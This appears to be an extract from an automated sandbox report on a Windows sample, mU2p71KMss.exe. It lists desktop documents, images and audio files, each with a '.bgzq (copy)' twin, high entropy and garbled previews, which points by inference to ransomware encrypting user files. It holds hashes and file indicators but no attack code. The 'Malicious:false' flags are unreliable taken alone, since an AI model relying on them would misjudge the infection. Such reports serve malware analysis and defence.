                                                                                                Preview:NVWZA.......@.r^..|.25e3g.`.g..E.5G)w...........%S]G../SZ].?y"*0`. X.{..h0...|.d...FW......@F.x.W.l.....Sh..".....-... %~...4...Y...g.].dl...X..)...h..E..6>...c.\...7...8..A..J.....}.MT.w._...[..)....j=A.......<6.)'.!.K.Q!...6J..A6t.7..."............Z.......f.*....O...}.c..9...`5..C..6k...~ =....1.V..6....2..H...?.Y....x..{..=]......._U.F3..8`... ...h....i..h.......]t....H.8.I.9..w..l{J;..V.S...58..N...(.=.....i....g&..p.E]9...ZsO........eN...V0....vI.......2.P.Z...... .:......MNUH9<].t6......G;F..*.LT#..=.z.$........`A..........'.l...../...:..Z..|.wo.].../.6....*...jC..` ...`3?...,`p.N.x...Z.gM.....B.r... x.?h.....yk./c."..!$ns.A6}...D....t(...>.......r..G.N..z...M.....y`.e.o $...|V... ...OR.y.>.....a......_..N.M=.i5(.F.07...V......u..pw/..'.e....P.h..n..,...@......:[R..uR..8O..`=..6..R....$x.o..-.w..x.L{._DI..O". y.v.....k.&>..a.......E..>o.........~V..T.&"G..[.]..L.+...0.....o.Ne.?;...vz+..J......&8..KW.%c..P9...H..oC.U]7.o.....j...bb.Tn.$.....!..z

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.855889765523058
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FKrW3EHrw5ZZAhHdaaYrTucoUOmQspCv2uXZA0+DlmpPZfSkUXfzIbD:FKr+9gbOpoUNNJ/0+BmdBOfzSD
                                                                                                MD5:8EFD964564294135C3680096D373EC4F
                                                                                                SHA1:A64B4A7FFFA3FFDDE12E7D2207713F4F09598694
                                                                                                SHA-256:F9613C52B17C5981C8C74D1673239ED9E91451E8F4E5CB2CDA059056AC8D6E61
                                                                                                SHA-512:BFE0BEE378C47F02B6E94027BF3D5759018E03756895AD030EA34897A4429FD2B054502519AFBB0FA285A954D2CCCD0BB1C44A26A05D32C569E4C050CD6C3593
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.......@.r^..|.25e3g.`.g..E.5G)w...........%S]G../SZ].?y"*0`. X.{..h0...|.d...FW......@F.x.W.l.....Sh..".....-... %~...4...Y...g.].dl...X..)...h..E..6>...c.\...7...8..A..J.....}.MT.w._...[..)....j=A.......<6.)'.!.K.Q!...6J..A6t.7..."............Z.......f.*....O...}.c..9...`5..C..6k...~ =....1.V..6....2..H...?.Y....x..{..=]......._U.F3..8`... ...h....i..h.......]t....H.8.I.9..w..l{J;..V.S...58..N...(.=.....i....g&..p.E]9...ZsO........eN...V0....vI.......2.P.Z...... .:......MNUH9<].t6......G;F..*.LT#..=.z.$........`A..........'.l...../...:..Z..|.wo.].../.6....*...jC..` ...`3?...,`p.N.x...Z.gM.....B.r... x.?h.....yk./c."..!$ns.A6}...D....t(...>.......r..G.N..z...M.....y`.e.o $...|V... ...OR.y.>.....a......_..N.M=.i5(.F.07...V......u..pw/..'.e....P.h..n..,...@......:[R..uR..8O..`=..6..R....$x.o..-.w..x.L{._DI..O". y.v.....k.&>..a.......E..>o.........~V..T.&"G..[.]..L.+...0.....o.Ne.?;...vz+..J......&8..KW.%c..P9...H..oC.U]7.o.....j...bb.Tn.$.....!..z

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.868687576814948
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FMHuoD031MMaGLi0dAAb49vE0V/9Cd4Orv12T25rNKrvAMXfzIbD:FM7eqMa0ddAA0v5nCaOD1D5rkrYWfzSD
                                                                                                MD5:0CB30AD2FF791A10CB96EB7E3E7D5D3B
                                                                                                SHA1:B7B5FBF0D5FB10BEEDEB2381329AB167D5B35631
                                                                                                SHA-256:B828E29D1E39E765B5146482E8CDFF446786215CCB1234690D03EDE7401FCE9E
                                                                                                SHA-512:6AFD7C9DC9B478E681156B2C72D61C46012C965E20481789467BFA057531EEAB41DE6B0AF699C391E5986CB19A5F958901D773E7948133A88F129F2F824D87E9
                                                                                                Malicious:false
                                                                                                Preview:NVWZAB.C.Gpi$`V.g..;.w(.".x.....S5.}...,%m.3....3...l.....z..,......S';..*".3.j.s.f...L..4K.@E...?..-....l......L..}n...]|}F.{O.}H.-.....N.v....qPOq...9..%...l.i..n..x...P../-.."..iX.....H..u.`*Cd.....y....E.)U9...L8.'Jm.l._]...Q..]...j]..T.>.;..D.)YQ'U..6fr.R....xw37.(^j.Q....""j.f..$.....&.k.,.......j.-i.{ewQ...9,I=......;.P....6....................W.#.TJ.c^..|..p.".c.y...1...SLz.{.b.M.M..r..|.O..?S.0.-..N..y...p...hG.5.....\;.C..(.3)..c..a.(..P........h....33....."..{(v.G.X...,2D.....W.....Z..5.7D...............F..b......x......6...'.m...o7.......W...'.#.F.%..*_..(.3Xo_...Hd.....z..`..9.h..W...o....o..1...F5Q.R.#..yQ.1dF.s.jDF..p.0.'..*.1....T......0.....D....m.L.-)w...B..nU..._9.G....i~...H.@.k..zEf.o.&7"<-4....-.P...w....bm.5......1...*....*.;..M......I.....N.G.|.w....y/9Ba.Kg.D.l.U..x!X.VABK.R.q..@.wy..:1i<.[.,..3.....n_...I/..:>.....ee.T1.=..k@.5.....M....^.l.....'..t9......0V3o.7.. V.2.[QYs.u.%..H]...........sP..!Z...._I+}...5.I..}i .

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.868687576814948
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FMHuoD031MMaGLi0dAAb49vE0V/9Cd4Orv12T25rNKrvAMXfzIbD:FM7eqMa0ddAA0v5nCaOD1D5rkrYWfzSD
                                                                                                MD5:0CB30AD2FF791A10CB96EB7E3E7D5D3B
                                                                                                SHA1:B7B5FBF0D5FB10BEEDEB2381329AB167D5B35631
                                                                                                SHA-256:B828E29D1E39E765B5146482E8CDFF446786215CCB1234690D03EDE7401FCE9E
                                                                                                SHA-512:6AFD7C9DC9B478E681156B2C72D61C46012C965E20481789467BFA057531EEAB41DE6B0AF699C391E5986CB19A5F958901D773E7948133A88F129F2F824D87E9
                                                                                                Malicious:false
                                                                                                Preview:NVWZAB.C.Gpi$`V.g..;.w(.".x.....S5.}...,%m.3....3...l.....z..,......S';..*".3.j.s.f...L..4K.@E...?..-....l......L..}n...]|}F.{O.}H.-.....N.v....qPOq...9..%...l.i..n..x...P../-.."..iX.....H..u.`*Cd.....y....E.)U9...L8.'Jm.l._]...Q..]...j]..T.>.;..D.)YQ'U..6fr.R....xw37.(^j.Q....""j.f..$.....&.k.,.......j.-i.{ewQ...9,I=......;.P....6....................W.#.TJ.c^..|..p.".c.y...1...SLz.{.b.M.M..r..|.O..?S.0.-..N..y...p...hG.5.....\;.C..(.3)..c..a.(..P........h....33....."..{(v.G.X...,2D.....W.....Z..5.7D...............F..b......x......6...'.m...o7.......W...'.#.F.%..*_..(.3Xo_...Hd.....z..`..9.h..W...o....o..1...F5Q.R.#..yQ.1dF.s.jDF..p.0.'..*.1....T......0.....D....m.L.-)w...B..nU..._9.G....i~...H.@.k..zEf.o.&7"<-4....-.P...w....bm.5......1...*....*.;..M......I.....N.G.|.w....y/9Ba.Kg.D.l.U..x!X.VABK.R.q..@.wy..:1i<.[.,..3.....n_...I/..:>.....ee.T1.=..k@.5.....M....^.l.....'..t9......0V3o.7.. V.2.[QYs.u.%..H]...........sP..!Z...._I+}...5.I..}i .

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838868884575847
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RTc2sLQ7gi/xvnvLfOHCCpnVHbLRnLEsVYI1QmVpbeHtgEN7AQqn0750wC0AQ5Xu:1LsLQ7JZPvTsCqJ04pSXqnCozyfzSD
                                                                                                MD5:AB06719C35FC9F715D6CF68F726352F2
                                                                                                SHA1:C9BE3DB1471CE50DF8C8763B52B31D6B426467B3
                                                                                                SHA-256:2E3E691C28FBEA4D153D17BD3DF35B1FE19A0928FA5B2378F14969DD9312313A
                                                                                                SHA-512:075B7F81AAE41160E50D018516D11B2035171FFA2572B0F31F88531AC9A204F8BB0CD75D67DCA95D36AE641E5CFAE3A670E3C479804295E4548E48C1809D2482
                                                                                                Malicious:false
                                                                                                Preview:EIVQS.B~.k.....8d.W.^...k.1]....J.N.>%...R?[....LL.J....m.5.I.d.....@56-.+.-....tlr..Ik.....&.......x6O-.._.+?..!.I......b.Be6Y....Y....RQgQ...h..X}4..g.:!...K.^=i......VMe.v(0.A.k.4L;N....Y3..L.......m.[c...:.PM.E....'..e.6F...:........-.n....zF.6.m..F....d-%@.n%.d........[....w...b~......KA......;).........h4..S^...&M.l.!.+..w.^.f....@`k.;u.w...A.....,...<.z&..R.~.Di'i.DKqS.CD.L...Sc%.g.X..@....l`8.A%HI.._'...N....r.P.j.;N'7.[3.U..#..XiQ..n1...k...1z..:.d.4.a..$V..d..*.....N.8e......lY`&.C.`#I\.U*$i6...7.....B...i...y...e...Z...%...n.ex.r.m?.p<y......H=h.5......8..E.^Dh7...&...5......_.....L..P...9d.T.8.......?..../.j.....i..*...'!b....k...a..lj....._.[..X..;..0kauD.n.L.....(.x.......B..WxQ..~;..aB...e..x3..?...f...!..A|.z.q.F[.\.Pz<.........O...T^.....V3.A..m.^S.'.>..i<....X.f ....4...-.L%b..v.u.W.Y...Yw|@.e...qOI.]...gE..bb.:.>...9...M8..T.M.......=..*.X..$\B.,*O.Z....E.....xZ.h..3#..4....1...V1.]....)......<..Q.@..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838868884575847
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RTc2sLQ7gi/xvnvLfOHCCpnVHbLRnLEsVYI1QmVpbeHtgEN7AQqn0750wC0AQ5Xu:1LsLQ7JZPvTsCqJ04pSXqnCozyfzSD
                                                                                                MD5:AB06719C35FC9F715D6CF68F726352F2
                                                                                                SHA1:C9BE3DB1471CE50DF8C8763B52B31D6B426467B3
                                                                                                SHA-256:2E3E691C28FBEA4D153D17BD3DF35B1FE19A0928FA5B2378F14969DD9312313A
                                                                                                SHA-512:075B7F81AAE41160E50D018516D11B2035171FFA2572B0F31F88531AC9A204F8BB0CD75D67DCA95D36AE641E5CFAE3A670E3C479804295E4548E48C1809D2482
                                                                                                Malicious:false
                                                                                                Preview:EIVQS.B~.k.....8d.W.^...k.1]....J.N.>%...R?[....LL.J....m.5.I.d.....@56-.+.-....tlr..Ik.....&.......x6O-.._.+?..!.I......b.Be6Y....Y....RQgQ...h..X}4..g.:!...K.^=i......VMe.v(0.A.k.4L;N....Y3..L.......m.[c...:.PM.E....'..e.6F...:........-.n....zF.6.m..F....d-%@.n%.d........[....w...b~......KA......;).........h4..S^...&M.l.!.+..w.^.f....@`k.;u.w...A.....,...<.z&..R.~.Di'i.DKqS.CD.L...Sc%.g.X..@....l`8.A%HI.._'...N....r.P.j.;N'7.[3.U..#..XiQ..n1...k...1z..:.d.4.a..$V..d..*.....N.8e......lY`&.C.`#I\.U*$i6...7.....B...i...y...e...Z...%...n.ex.r.m?.p<y......H=h.5......8..E.^Dh7...&...5......_.....L..P...9d.T.8.......?..../.j.....i..*...'!b....k...a..lj....._.[..X..;..0kauD.n.L.....(.x.......B..WxQ..~;..aB...e..x3..?...f...!..A|.z.q.F[.\.Pz<.........O...T^.....V3.A..m.^S.'.>..i<....X.f ....4...-.L%b..v.u.W.Y...Yw|@.e...qOI.]...gE..bb.:.>...9...M8..T.M.......=..*.X..$\B.,*O.Z....E.....xZ.h..3#..4....1...V1.]....)......<..Q.@..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8773713337882025
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FU6stDfIJBwS/00CuyRr56OCDPfIFAe1yFLwAeq7DmgtCVDRRRdov6mqYu+Df+ak:FUtDAJSSc0CFr5zMfWBAz7VtCVDRRq3w
                                                                                                MD5:1FF76395F6A1F92353E5DEADE69BB386
                                                                                                SHA1:8EA351D337818025D2E0A394374146373467A21B
                                                                                                SHA-256:4A143B0B777126FF1073DDD5DBBFD9E05E8E96BC92413C955C120C45E2793608
                                                                                                SHA-512:CA345766755FEA4AB685A1208AE33A519A0DDAD7E6E8A4EB92D0ACCA29AB32DA3B541BFAC258230DEB9ACA84C4F5233DFC8A65D8F11627A570D097BB8104A65B
                                                                                                Malicious:false
                                                                                                Preview:NVWZA2..>..*.6.q.J.g..-.?.9...[o.....vfd.....zz,.A.w.N.0..._V.GP..#...t.......o.....=r...*G....^..S...m.f...E..,..O...B........){.lr...!.|..M..z...l.....l.R].d.C..........E...('\...^Q....v.F./.@.r..u{....N.M.t.rdEP..n(.'a....!....S...lU../4...y+..i.WE.'..bN.;7..]...0.~...vz.A..d.w.......3..#.....k.*s..~.a/..ez..1p.w.,<....`@..3...).....m.D>.%`.^.J..#....X..8Tq._..'...Y.......6v.Z;..^B....B..%.c..v...4}k.C.lC:O....w......Q..6,......w0.%...U.'.....W......YG......u#."..UN....3%\8T..Lt_.$o.A...a......c.. .`aaU.)....N.;..:....b.[.. .:.ML(......(...p'..t....z.:0._!eIHz..(9{....'....@g..z^.k..G.L....~d..7../P.Pc.s6l/f..l......)..E1..[6D0....O.o'J....D...L.S.%....S.........JU.\.z..Umq'hi'...p`P.[.........e%....6#zF....]..?......y.I>......+s.&.......'.#.i.5w.....C1.L..8.c.....=....LH2YP.H..{.I..F.K...Q. ..+.]..8A...Z.u.......}.......!...2.*9.r...+.k._s..M..w.>.?.|.}`..........O........T....Z..QA.1..~..^=x!. ..*w..>..T.......].CdF....e..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8773713337882025
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FU6stDfIJBwS/00CuyRr56OCDPfIFAe1yFLwAeq7DmgtCVDRRRdov6mqYu+Df+ak:FUtDAJSSc0CFr5zMfWBAz7VtCVDRRq3w
                                                                                                MD5:1FF76395F6A1F92353E5DEADE69BB386
                                                                                                SHA1:8EA351D337818025D2E0A394374146373467A21B
                                                                                                SHA-256:4A143B0B777126FF1073DDD5DBBFD9E05E8E96BC92413C955C120C45E2793608
                                                                                                SHA-512:CA345766755FEA4AB685A1208AE33A519A0DDAD7E6E8A4EB92D0ACCA29AB32DA3B541BFAC258230DEB9ACA84C4F5233DFC8A65D8F11627A570D097BB8104A65B
                                                                                                Malicious:false
                                                                                                Preview:NVWZA2..>..*.6.q.J.g..-.?.9...[o.....vfd.....zz,.A.w.N.0..._V.GP..#...t.......o.....=r...*G....^..S...m.f...E..,..O...B........){.lr...!.|..M..z...l.....l.R].d.C..........E...('\...^Q....v.F./.@.r..u{....N.M.t.rdEP..n(.'a....!....S...lU../4...y+..i.WE.'..bN.;7..]...0.~...vz.A..d.w.......3..#.....k.*s..~.a/..ez..1p.w.,<....`@..3...).....m.D>.%`.^.J..#....X..8Tq._..'...Y.......6v.Z;..^B....B..%.c..v...4}k.C.lC:O....w......Q..6,......w0.%...U.'.....W......YG......u#."..UN....3%\8T..Lt_.$o.A...a......c.. .`aaU.)....N.;..:....b.[.. .:.ML(......(...p'..t....z.:0._!eIHz..(9{....'....@g..z^.k..G.L....~d..7../P.Pc.s6l/f..l......)..E1..[6D0....O.o'J....D...L.S.%....S.........JU.\.z..Umq'hi'...p`P.[.........e%....6#zF....]..?......y.I>......+s.&.......'.#.i.5w.....C1.L..8.c.....=....LH2YP.H..{.I..F.K...Q. ..+.]..8A...Z.u.......}.......!...2.*9.r...+.k._s..M..w.>.?.|.}`..........O........T....Z..QA.1..~..^=x!. ..*w..>..T.......].CdF....e..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858492854013779
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZlWChuWgSHtLt3BDuJ2JUVGx4FCWZiN+iIbxOtSd78OoWcX6zYXfzIbD:ZlWChh5txD02JUVGwbcNMY+zoWc5fzSD
                                                                                                MD5:21C4E520BEF8D6A16EF3C1F2227CD627
                                                                                                SHA1:A6C1FA55898FCF064059EE50132FF3226E40AD5C
                                                                                                SHA-256:6F7B82EF8597E3F3FDF38EC0CE4DD31FCF8EFB72727C3357240DA38FED702A4F
                                                                                                SHA-512:335DC2C3F0F45A8C6F1D06C5C3198A1DBD6337D6A4A6035FF5B8A6B0CA171C22B3A540FA9129FB563145E1AB92FD316D25B60A0A15A944A6FBBBCA9FF1C61FF4
                                                                                                Malicious:false
                                                                                                Preview:PALRGT..$V.S}.J...~...........+.Stf.=.U&...g.Bws......g.p;E.. .&'..%...a....u.<.....L.}.~...,.~.2...D...]...A........j...T...kxf..s...x.C.aS/1.Y2f......P..N.AN........wH...X...u%O.p*.B..Z$..XU...r.cwY.......R...|[......,[.A-.......m....V..2....!.......Z.tf.R..W..>....G..+...k[.[Zb..c...._....#.(#D.....YT*.K3...Y|c6CZ...t.f..b3<.6.@!.N....[.....2...B..?O.....|>.-.*..A..N...~....,.#.Xw..#.^.>.......~.O.....w..G.'.Q...c.~6&.=W.m..A.3.s..,P..Y8..J...%.h...,_ZD|Fa|....n./.1D.f.r.'o.7..Q..G..<*..".Z.A..I..;....`...2`...e ~....[R.z.H!....%..H.H.=0.6.Jr.2..Q61^..-.Rv:M".M........N1Z.] .....>.!.:$5.>....\........e.!.A.c...N*..:M.......d.ky..6..q.3...-C.....};...\tRE.}.\......q>.U45"X_Y.:....Hp.Yt....KVsp.J.........\...A.uj^#x@..H..p..O.G..C.u....J.+"N.E..b3[c7..D...-{..E.n.`.=...XJ.P...?.c...,v...Ao...lp.#...F8T..'.../j.....4.....\.H..k2..cT.D=..u>-g.....+s$.K(.-../p.U(({.l...J...*..-@N._....a.J.rF.....\...~..x.....}(n.....:.F..+`eN...K.xS...V

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858492854013779
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZlWChuWgSHtLt3BDuJ2JUVGx4FCWZiN+iIbxOtSd78OoWcX6zYXfzIbD:ZlWChh5txD02JUVGwbcNMY+zoWc5fzSD
                                                                                                MD5:21C4E520BEF8D6A16EF3C1F2227CD627
                                                                                                SHA1:A6C1FA55898FCF064059EE50132FF3226E40AD5C
                                                                                                SHA-256:6F7B82EF8597E3F3FDF38EC0CE4DD31FCF8EFB72727C3357240DA38FED702A4F
                                                                                                SHA-512:335DC2C3F0F45A8C6F1D06C5C3198A1DBD6337D6A4A6035FF5B8A6B0CA171C22B3A540FA9129FB563145E1AB92FD316D25B60A0A15A944A6FBBBCA9FF1C61FF4
                                                                                                Malicious:false
                                                                                                Preview:PALRGT..$V.S}.J...~...........+.Stf.=.U&...g.Bws......g.p;E.. .&'..%...a....u.<.....L.}.~...,.~.2...D...]...A........j...T...kxf..s...x.C.aS/1.Y2f......P..N.AN........wH...X...u%O.p*.B..Z$..XU...r.cwY.......R...|[......,[.A-.......m....V..2....!.......Z.tf.R..W..>....G..+...k[.[Zb..c...._....#.(#D.....YT*.K3...Y|c6CZ...t.f..b3<.6.@!.N....[.....2...B..?O.....|>.-.*..A..N...~....,.#.Xw..#.^.>.......~.O.....w..G.'.Q...c.~6&.=W.m..A.3.s..,P..Y8..J...%.h...,_ZD|Fa|....n./.1D.f.r.'o.7..Q..G..<*..".Z.A..I..;....`...2`...e ~....[R.z.H!....%..H.H.=0.6.Jr.2..Q61^..-.Rv:M".M........N1Z.] .....>.!.:$5.>....\........e.!.A.c...N*..:M.......d.ky..6..q.3...-C.....};...\tRE.}.\......q>.U45"X_Y.:....Hp.Yt....KVsp.J.........\...A.uj^#x@..H..p..O.G..C.u....J.+"N.E..b3[c7..D...-{..E.n.`.=...XJ.P...?.c...,v...Ao...lp.#...F8T..'.../j.....4.....\.H..k2..cT.D=..u>-g.....+s$.K(.-../p.U(({.l...J...*..-@N._....a.J.rF.....\...~..x.....}(n.....:.F..+`eN...K.xS...V

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.88218686358104
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YmFRI8HZ/2Rt5Ol6AcpS2OZ8DM8Zo0Pr+vTw+tZc9Z2kj4XJCBi5uQXfzIbD:hFxFGt5OlXn4MTmrQ3SZpafzSD
                                                                                                MD5:058350B56B69E60C9DE4AA556C2C44C7
                                                                                                SHA1:D119B06A1C4E1E271CF24154731D0CD36443BEFF
                                                                                                SHA-256:BB1F73703D69E196C750C742BE86120841DE0DA361AA17DA5E1E1F6679D05BB6
                                                                                                SHA-512:2B6842E57E36A3A93D26EB0BF2C0D90F5AEB67CE74972EE426E8D8B8B0F09CBFB3A6692658F0C5271E10DF46692C1729B1937C12278517346FD846F7DC4B54FA
                                                                                                Malicious:false
                                                                                                Preview:TQDFJX..p..K.p.:..,\.y.eU...0.R...2m...,........,..}...J....].:.. 7.o..6-ad..Q.F.E......].....n.A.ul..(..D@Je.y...9..CE....u|).....h.....?.....nz.h.=...kII...u..q....F.l^..2...^.d.......9_..8...J....H[.G.F.BRnD.)x..)q*f.kW..2.d.DW..L.=...7.mc.P.@!.l......p..b'Ih...._...7..s.w:..W.+z/..[k.7./hj..-2.',.y<l...C*.*..fY....(r$.....Y...............N..3..If..*....(1#.......-.,.K.gT..L*..Q.s......z.Q..t.ia..b.s.j......".0lu...~B..\>.v";.6B..;i..........M..>.:...NM.R......\V.'-..k..&`9..F".tz..[.d..p6.Q(.R...c%Q(.&..m.L......B....AS."Q9...(.3...q.qM.!....{..........7..u..].o.s..<."+..x.G...F...D.....Z.H"..p.j..X?...u..{F.L...8m\..!..s..8C..4....:.`8#........ .......F...6.Plf.d.{.i...]@...J\+.....MD`.....W4...y)[<v .t.]j......I...X|.0........?}....?...>.P.r.]o....K..Rh..L..>.PT.>...r..n6.....j.....1...".=.i..OR....C...El..UQS...'o..>-.U.H..B...a..i..R..R.I..x......$...U.<._..6..h..zHq.. ...|..B_;....t..w...g....wm..).\..N.J....K.$..R/..w...7...V..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.88218686358104
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YmFRI8HZ/2Rt5Ol6AcpS2OZ8DM8Zo0Pr+vTw+tZc9Z2kj4XJCBi5uQXfzIbD:hFxFGt5OlXn4MTmrQ3SZpafzSD
                                                                                                MD5:058350B56B69E60C9DE4AA556C2C44C7
                                                                                                SHA1:D119B06A1C4E1E271CF24154731D0CD36443BEFF
                                                                                                SHA-256:BB1F73703D69E196C750C742BE86120841DE0DA361AA17DA5E1E1F6679D05BB6
                                                                                                SHA-512:2B6842E57E36A3A93D26EB0BF2C0D90F5AEB67CE74972EE426E8D8B8B0F09CBFB3A6692658F0C5271E10DF46692C1729B1937C12278517346FD846F7DC4B54FA
                                                                                                Malicious:false
                                                                                                Preview:TQDFJX..p..K.p.:..,\.y.eU...0.R...2m...,........,..}...J....].:.. 7.o..6-ad..Q.F.E......].....n.A.ul..(..D@Je.y...9..CE....u|).....h.....?.....nz.h.=...kII...u..q....F.l^..2...^.d.......9_..8...J....H[.G.F.BRnD.)x..)q*f.kW..2.d.DW..L.=...7.mc.P.@!.l......p..b'Ih...._...7..s.w:..W.+z/..[k.7./hj..-2.',.y<l...C*.*..fY....(r$.....Y...............N..3..If..*....(1#.......-.,.K.gT..L*..Q.s......z.Q..t.ia..b.s.j......".0lu...~B..\>.v";.6B..;i..........M..>.:...NM.R......\V.'-..k..&`9..F".tz..[.d..p6.Q(.R...c%Q(.&..m.L......B....AS."Q9...(.3...q.qM.!....{..........7..u..].o.s..<."+..x.G...F...D.....Z.H"..p.j..X?...u..{F.L...8m\..!..s..8C..4....:.`8#........ .......F...6.Plf.d.{.i...]@...J\+.....MD`.....W4...y)[<v .t.]j......I...X|.0........?}....?...>.P.r.]o....K..Rh..L..>.PT.>...r..n6.....j.....1...".=.i..OR....C...El..UQS...'o..>-.U.H..B...a..i..R..R.I..x......$...U.<._..6..h..zHq.. ...|..B_;....t..w...g....wm..).\..N.J....K.$..R/..w...7...V..

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\UNKRLCVOHV.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.840277856022688
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0iRvfVaygnjZg8600+sxuQZHARvPr4h/Wl56EzBn7f/6GIL6Za8DR5XfzIbD:n3VcjZy0xsZgBsQaEVu4aErfzSD
                                                                                                MD5:E17200BFC33DBCCC6423C38C617A8CC7
                                                                                                SHA1:DE001565FED592694CD5D2ABE66F3E3CD949379D
                                                                                                SHA-256:BBDFD242A9115FA80E502F68743DB1E62CADD533D909CE1DA7B795AB81118F9E
                                                                                                SHA-512:AF40B089D510D24C9CB95C24270941C4B971335DABE65B1F636D1DE6F4629E6169F7E6823245B88C5E7D62FF33C3BBE73FBE5497C18724A5BBB4A4E398981FC8
                                                                                                Malicious:false
                                                                                                Preview:UNKRL...."Jp.~S..c<..X*.,Q0o.>......y....W...S8W.RL....E..G.).!..(?..P&&E...n..F..1Yz.s;....B.:..d.........k_..hU..C..!|.<.(d&.-.,..l.h4&.....?....Y...Q4..'...E6-&X.t2.R.:R..e.&`w.j9.......3.w.....mm.;..C...D6.H...WB..gL..f...:..QO...<U..H......F.KdN.....1J.U.~gO.v..|....UX.<..">.i.t..<...4...O..S0.s......H...=K..ZK.'......j......V....Yb...rm.',..J6m.-...;...t...l...C..o.......*...y....E.w6.y......H..v.....H......L.U.b2H...NpBb.....?.`..'..j,.%u..qJ.l..l..HR.T>}._.=Ma....:k2f.34..h..$.../.0.w~.$(.;.+.....Mq.Ac.R..E.'..d..P..A...\n<.L......V....T.....r)....E5.<!..>#T0....Auz.]+.9...w.]Z....2%....\...2C..p6.;.....`P24o.(....u...4.,..............'.T....v.x.A.4.h..+..*.._..(.X(....[<.......n..%8.I..z.e.....}T.......).c..V..q......)eN...>=...^......5...$.4...V;.:..v&D+....$.j.56...k..P[..f`....X4...lH|..h%...Y....1....O........;..y.5)..........A.....Y.&l.&...7.'..<`.&.#..qYS(. V.h3.(.....}^4.../<D...u.~..wp.|N.L..3...9.c..$....h\..........S.A.&q..x.$\D..>..m

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL\UNKRLCVOHV.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.840277856022688
                                                                                                Encrypted:false
